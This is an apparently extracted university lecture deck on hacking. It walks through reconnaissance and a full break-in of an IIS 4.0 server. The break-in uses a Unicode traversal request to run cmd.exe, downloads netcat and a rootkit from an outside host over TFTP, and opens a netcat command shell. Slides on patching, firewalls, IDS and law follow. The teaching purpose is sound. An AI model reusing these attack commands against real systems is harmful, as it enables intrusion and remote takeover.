Software Security

1
Software Security Hacking

• Dan Guerndt
• guerndtd_at_uwplatt.edu

2
Outline

• Types of Hackers
• The Hacker you dont want to be against
• Information needed by a Hacker
• Tools needed by a Hacker
• WhoIs Databases
• Social Engineering
• Example of Breaking Into a System
• Defensive Measures
• How the Law deals with Hacking

3
Introduction

• Why learn how to hack?
• Best offense is the best defense
• Become a Hacker to learn what they need and use
• Use hacking to find entry points into your own
  system
• Defensive measures to be taken against attackers

4
Types of Hackers

• Three tier pyramid
• Cream of the crop
• IQs that boil water
• Can write scripts and tools
• Can find vulnerabilities
• IT Savvy
• Script Kiddies
• Easiest to get caught
• Fires off scripts/programs until something works
• All of them are very dangerous

5
Typical Hacker you dont want to be against

• Unlimited Patience
• Sometimes it can take a long time to crack a
  system
• Wait for the administrator to backup system
• Planned Attack
• Extensive Research
• Doesnt take easy approaches (traps)
• Social Engineer
• Only uses the most stealthy approaches

6
Information needed by a Hacker

• Domain Name
• IP Address
• Operating System Version Number
• Open Ports
• Knowledge of IDS/Firewalls
• Vulnerabilities
• System Admins Name/Contact

7
Tools needed by a Hacker

• WhoIs Databases
• Port Scanning Program(s)
• NetCat Swiss Army Knife
• Nmap
• Nslookup
• RootKit
• Vulnerability Databases or extreme knowledge

8
WhoIs Databases

• Types of Queries
• Registrar Attacker must find the correct
  Registrar -http//www.internic.net/whois.html
• Domain Gets Domain Name, Admin Contact, DNS
  server info
• Network Gets specific network blocks that
  organization owns Http//www.arin.net
• Point of Contact Search ARIN using email
  address from Domain Query will sometimes
  provide more domains that attacker did not know
  about

9
Social Engineering

• Attacker acts like he/she belongs
• I LOVE YOU virus
• Attacker that goes to HQ
• Interview Example
• Women

10
Breaking into a System Step 1

• Find webpage of Target
• Do a port scan on the Targets Webpage
• Nmap, Netcat, Nslookup
• Nslookup web site
• http//www.kloth.net/services/nslookup.php
• Gives IP Address

11
Breaking Into a System Step 2

• Need the rest of the target networks IP address
  range
• ARIN Database Search gives every IP
• Nmap gives only IPs with open ports
• One time ACK/SYN
• nmap sP 208.37.215.0/24
• Interesting ports on 208.37.215.233
• The 1529 ports scanned but not shown below are
  in state closed
• Port State Service
• 21/tcp open ftp
• 22/tcp open ssn
• 23/tcp open telnet
• 79/tcp open finger
• 80/tcp open http
• 143/tcp open imap2
• Nmap run completed 256 IP addresses 1 host up
  scanned in 360 seconds

12
Breaking into a System Step 3

• Dont want to use Nmap for OS guessing
• Use Telnet instead
• Most web servers are designed to provide their
  HTTP version and operating system

13
Step 3 (Continued)

• telent 208.37.215.233 80
• Trying 208.37.215.233
• Connected to 208.37.215.233.
• Escape character is .
• HEAD / HTTP/1.0
• HTTP/1.1 200 OK
• Server Microsoft-IIS/4.0
• Date Fri, 16 Feb 2001 184523 GMT
• Context-Length526
• Context-Type text/html
• Connection closed by foreign host.
• Now have to find vulnerabilities for Windows NT
  4.0 and IIS

14
Breaking Into a System Step 4

• As a rule of thumb, the latest vulnerabilities
  are often the least defended against
• After finding vulnerabilities, attacker will
  exploit them
• This example uses a Unicode bug

15
Step 4 (Continued)

• telnet 208.37.215.233 80
• Trying 208.37.215.233
• Connected to 208.37.215.233.
• Escape character is .
• GET /scripts/..c19c../winnt/system32/cmd.exe?/c
  echotestmessagegt
• test.msg
• HTTP/1.1 200 OK
• Server Microsoft-IIS/4.0
• Date Fri, 16 Feb 2001 192032 GMT
• Content-Length 0
• Content-Type text/plain
• Connection closed by foreign host.
• Seems to have worked No error, must double
  check
• GET /scripts/..c19c../winnt/system32/cmd.exe?/c
  typetest.msg
• This GET displays the file created above
• We now have the ability to read and write on the
  server

16
Breaking Into a System Step 5

• Attacker must download 2 Programs onto the target
  system
• RootKit
• NetCat to open our own ports
• Since Windows NT does not support passive FTP,
  the attacker must use TFTP (Trivial File Transfer
  Protocol)
• GET /scripts/..c19c../winnt/system32/cmd.exe?/c
  tftp-i216.240.45.60GETnc.exe

17
Step 5 (Continued)

• Download NetCat
• GET /scripts/..c19c../winnt/system32/cmd.exe?/c
  tftp-i216.240.45.60GETNetCat.exe
• Download RootKit
• GET /scripts/..c19c../winnt/system32/cmd.exe?/c
  tftp-i216.240.45.60GETRootKit.exe

18
Step 5 (Continued)

• Attacker must issue a Netcat command to bind a
  port for the attackers use
• GET /scripts/.c19c../winnt/system32/cmd.exe?/cn
  c.exe-1-p100-t-ecmd.exe
• Binds attacker a port on Port 100 (must use a
  port not currently in use on the target system)

19
Step 5 (Continued)

• telnet 208.37.215.233 100
• Trying 208.37.215.233.
• Connected to 208.37.215.233.
• Escape character is .
• C\winnt\system32\gt
• Now have System access and the attacker runs the
  Rootkit

20
Defending against Hackers

• Patch (1 Defense)
• Check for updates daily
• Vendors should correct mistakes quickly
• Be aware of Vulnerabilities not protected
• If attacker cannot find a vulnerability on the
  Internet, the attacker would have to find out a
  new unknown vulnerability not yet released to the
  public

21
Defending (Continued)

• Firewall
• The less open ports the better
• Less vulnerability targets
• IDS (intrusion detection system)
• Finds abnormal traffic, but usually does not stop
• Sets a flag
• Very hard for attackers to detect
• Works internally and externally
• Can be completely passive

22
Defending (Continued)

• Do not release incriminating information
• Watch what is on WhoIs Databases
• Be careful what info is released on company
  websites
• Attackers will often give up if the info cannot
  be found
• Be careful what is shown at the company site
• Servers should not be publicly shown
• No toy penguins!

23
Defending (Continued)

• 70 of all attacks are done by employees
• If an employee leaves and puts in malicious code
  before leaving, he/she may have a backdoor
• Full Audit!
• Time and Money
• All code must be documented properly
• Model diagrams also help to compare with written
  code

24
Defending (Continued)

• Set up a trap
• Leave open an obvious easy entry point
• Do not use the entry point at all
• Flag every occurrence of its use

25
Law and Hacking

• Conviction often considered as a Felony
• Good luck getting an IT job with a hacking
  conviction!
• Fines and time spent in jail depends on damage
  done
• 5 years
• 250,000 fine

26
Test your might!

• www.hackthissite.org

27
Conclusion

• All types of attackers are dangerous
• Attackers need info tools
• Exposed server information should be hidden
• Anything is penetrable, no matter how secure
• Be weary of disgruntled employees and social
  engineering ploys
• Patch frequently

28
References

• 1 Ahmad, David R. Mirza. Russel, Ryan. Hack
  Proofing Your Network. Rockland Syngress
  Publishing, Inc. 2002.
• 2 McClure, Stuart Scambray, Joel Kurtz,
  George. Hacking Explosed Network Security
  Secrets Solutions. Fourth Edition. Berkeley
  Nordin. 2003.
• 3 Hack Proofing Your Web Applications The Only
  Way to Stop a Hacker is to Think Like One.
  Rockland Syngress Publishing, Inc., 2001.
• 4 Chirillo, John. Hack Attacks Testing How to
  Conduct Your Own Security Audit. Indianapolis
  John Wiely Sons, Inc. 2003.